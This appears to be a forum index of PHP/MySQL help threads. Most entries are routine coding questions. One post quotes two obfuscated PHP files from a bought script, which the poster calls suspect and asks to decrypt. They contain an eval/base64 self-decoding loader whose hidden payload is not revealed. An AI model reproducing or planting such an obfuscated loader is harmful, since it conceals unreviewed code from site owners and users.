39,388 Topics

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Member Avatar for strongpot

I have two tables. tbl_clients and tbl_projects. They both contain auto incremented primary key columns. For adding new projects to tbl_projects, I use tbl_clients' clientname field to populate a dropdown menu on the new projects html form. The user chooses a client name from the menu, and the primary key …

Member Avatar for strongpot
Member Avatar for IanArcher

Hi i'm trying to successfully get this PHP code to search MySQL database called test2 that has a table called questions, in that table there are columns called ID, Question, Category and Answer. This code is an excerpt from a tutorial that allows you to search the mysql database for …

Member Avatar for IanArcher
Member Avatar for BlueCharge

Hi Everyone, I have built my own forums and currently they are displayed in the order of newest posted (id DESC). What I want to do is keep this order however, if there was a topic which was created months ago that is not on the first page for example, …

Member Avatar for BlueCharge
Member Avatar for ppenguin

Trying to figure out why a script that worked perfectly well on Linux is not working on Windows server now after I moved it. It has the latest version of PHP installed and there is no reason it should not work on both. I have posted the code snippet, however …

Member Avatar for ppenguin
Member Avatar for desmond_ckl

Hi experts, im new to coding and i really need help for this. i have done a shopping cart calculation using javascript my question now is, HOW TO SEND JAVASCRIPT VALUE INTO DATABASE (MYSQL) ?? [CODE] <?php require_once 'library/config.php'; require_once 'library/cart-functions.php'; $action = (isset($_GET['action']) && $_GET['action'] != '') ? $_GET['action'] …

Member Avatar for stbuchok
Member Avatar for hindu times

Hi there, I'm currently adding in a recaptcha to a contact form that I didn't create in the first place, so I've been tentatively working my way around it. For some reason though, every time I complete my form, no matter whether the captcha I entered was right or not, …

Member Avatar for pritaeas
Member Avatar for whiteyoh

Hi All, I currently have an .htaccess set up to rewrite to a single URL. at the minute it is for places. so mysite.com/region/town will rewrite to places.php i now need to add another, this time for skill i.e. mysite.com/construction/bricklayer and i want it to redirect to skills.php i have …

Member Avatar for pritaeas
Member Avatar for rohit.k2903

How I can solve below problem.. ? [CODE]SoftException in Application.cpp:357: UID of script “/home/username/public_html/file.php” is smaller than min_uid[/CODE]

Member Avatar for pritaeas
Member Avatar for morrisproject

Hi I have created a new Recordset which uses the ConveyorNumber to display information relating to a particular conveyor. The recordset should use this from the conveyornumber field on a prevoius page so when history is clicked the hostory of that one conveyor will appear. I have added a Dynamic …

Member Avatar for Nick Evan
Member Avatar for IanArcher

Here is my website [url]http://projecttower.site50.net/questions/[/url] I have a collapsible panel there that whenever it's clicked it shows a form where you add a question, answer and ID. the first form is for a file on my server called [URL="http://projecttower.site50.net/questions/questions.htm"]questions.htm[/URL] the index.htm file is a live search results page that reads …

Member Avatar for Stefano Mtangoo
Member Avatar for Buppy

Hi, I'd like some help on this - i have a textarea field, where the user can enter text. The line breaks (\n\r) has to act as real line breaks. So, i've successfully replaced the breaks with the <br /> tag, however, here's the problem - when the user edits …

Member Avatar for diafol
Member Avatar for asif49

I'm searching a mysql database getting results which match the searched keyword. When the keyword is found within the search string I want to show the searcher that keyword before cutting the showed string down to 500 chars, therefore I move back from the keyword 1 char at a time …

Member Avatar for asif49
Member Avatar for urbangeek

hi everyone. i want to list and show the table names in a database in a php page. how to do that? in phpmyadmin 'show tables' works in query window. bt showing it through a php script i think i would have to SELECT?

Member Avatar for veedeoo
Member Avatar for 54uydf

is there [B]AAAAAAAAAAAANY [/B]way to take an xls file and convert it to xlsx using a php code? I've googled but I see not many people asked this and those who had similar problems found no solution. I've tried using PHPExcel but I can't figure out how to do it …

Member Avatar for rch1231
Member Avatar for garyrichard

I am new to PHP and wanted to know that which reporting tool is used PHP/MYSQL based projects... to fetch data from mysql using php from which pdf can be generated also.. As Crystal report 11 has lots of good functionallity but doesn't has support for php . . So …

Member Avatar for HITMANOF44th
Member Avatar for asif49

For the search feature on my site, the user searches for a term or a phrase then it gets processed and using the "LIKE" query to the mysql database - the relevant results are gotten. then they are shortened to 500 characters so snippets of the matching results are shown …

Member Avatar for asif49
Member Avatar for rohit.k2903

I recently switched to a new server... But I am facing problem. On opening every .php page I am getting [B]following error[/B]. Html pages are working fine but .php files not. I uploaded a simple php page that have a single echo statement... still I am getting below error.. [CODE] …

Member Avatar for Smeagel13
Member Avatar for RMelnikas

I Currently have a form where we have people putting an application forward and the form consists of this code: [CODE]<label for="age">Age Group:<span class="red">*</span></label><br/>//here!!!! <input name="age" type="checkbox" value="11s">11/under <input name="age" type="checkbox" value="13s">13/under <input name="age" type="checkbox" value="17s">17/under <input name="age" type="checkbox" value="open">Open <em>If trailing for two age groups please ensure both age …

Member Avatar for Smeagel13
Member Avatar for Panathinaikos22

Hello hipos, using php language you have all tags of html? i mean using php language you can program like html + plus php features? I dont see HTML category here, and html is most importan thing a new web-developer must learn... [COLOR="red"][B]AOUTS![/B][/COLOR] Web Design -> HTML lol, HTML dont …

Member Avatar for Panathinaikos22
Member Avatar for hindu times

Hi there, I'm currently adding in a recaptcha to a contact form that I didn't create in the first place, so I've been tentatively working my way around it. For some reason though, every time I complete my form, no matter whether the captcha I entered was right or not, …

Member Avatar for vlowe

hi i have created a php file which calls a php function and echos the results. i dont want to display the results i want to use them in a jquery function. [CODE] jQuery('body').prepend("<div id='target'></div>"); gMap.gmap3({ action: 'init', onces: { bounds_changed: function() { var number = 0; jQuery(this).gmap3({ action: 'getBounds', …

Member Avatar for pritaeas
Member Avatar for onlinessp

Hi, i writing a small application in php->symfony.In one place i need to define max-height and overflow values in input_auto_complete_tag. please help me.THNAKS in advance

Member Avatar for Stefano Mtangoo

Hi, I have DAL class and I have done Query Parametrization to avoid SQL injection. As you can see the weakpoing for Dynamic Query is table_name and column name. I have made small function to (hopefully) validate table variable before I can add to SQL command string. Now I was …

Member Avatar for Stefano Mtangoo
Member Avatar for julio gomez

Hi, I get an error 500 when I try to open my web page with IE, but not with other Programs as Firefox or Safari. The problem I think is with the redirect in the index.php file, but I don't see the problem. Here is the code: [code=php]<? fcnX('home.php');[/code] And …

Member Avatar for KEN74
Member Avatar for rayidi

Hi Friends, Please check this code where i was did wrong ? thanks in advance. [CODE]<button type="button" onclick='showData()'>Edit</button>[/CODE] [CODE] <script type="text/javascript"> function showData() { if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 …

Member Avatar for rayidi
Member Avatar for cwarn23

Wow, did you notice php.net just went offline. What will we do without the manual for those few minutes or hours while it's down for maintenance.

Member Avatar for Stefano Mtangoo
Member Avatar for MrCranium

I bought a script but it has two suspects encrypted files that I want to decrypt. Does anyone know how to do? [CODE]<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=484;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGY0KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLT09NHeEXHr8XhtONT08XHeEXHr8Pkr8XTzEXT08XHtILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==tmklFbapFMagd25jcUEPwtwVRJ9jd25MDBFVFoiXwJLIKXppcJEPwolVfucidtEPwtOgA0aTA0lNTlSJdo9mDB5gCBOsDB5gDBWJbUEpwe09weEIhWp7tMilCBOlFJEPwtkSd2YifolvdjppdMOlGt5XDuEJhUE7tMa4DbWIhtEpweShgWpZcby1Dbklb29VC2AIhtEJRJ4vC2xiF3YlFZ9sDbYjRMc1dMHVFoiXwJLIKXpZcby1Dbklb29VC2AIhtEJRJ4vC2xiF3YlFZ9sCB5pFuaSCbOlRmnPFtwpweShkoOiforINUnVcbFIOoy0CA1idMlXfBxifo9ZwtIIhUE7tJO0DbOScUE9wtOLCbOiRT5zcBxlC3WIhtEJA2l0cA1idMymcbwJRtwQwJxiFmkiGUEPwtkTDbOlaMyZDByJdoAJNT4JA2l0cA5idBAJhUEpweShkuOpfoxlwe0IkuOpfoxlBznfweSh[/CODE] and: [CODE]<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=1804;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGY1KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>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[/CODE]

Member Avatar for cwarn23
Member Avatar for asif49

I'm working on a search engine for my website. It seems that I ALMOST have it all working pretty nicely except a little thing. What happens is that the amount of results specified in $limit is displayed on the first page, then the following pages display the exact same results …

Member Avatar for asif49
Member Avatar for roottybrian

Hi guys, I wish to read a file with several lines with columns, and display the first three columns in each line. Anyone with an idea on that? File has these contents: [CODE] Dy MxT MnT AvT HDDay AvDP 1HrP TPcpn WxType PDir AvSp Dir MxS SkyC MxR MnR AvSLP …

Member Avatar for diafol
Member Avatar for utroda

Hello, I'm trying to replace {include %filename.php%} with that file from the server. I can get this to work file if the file is plan html text using the function below. [CODE] $str = "This would be a paragraph of text. {include %news.php%}"; preg_replace_callback("/\{include %(.*?)\%}/", function($m) { return file_get_contents(CORE . …

Member Avatar for utroda

The End.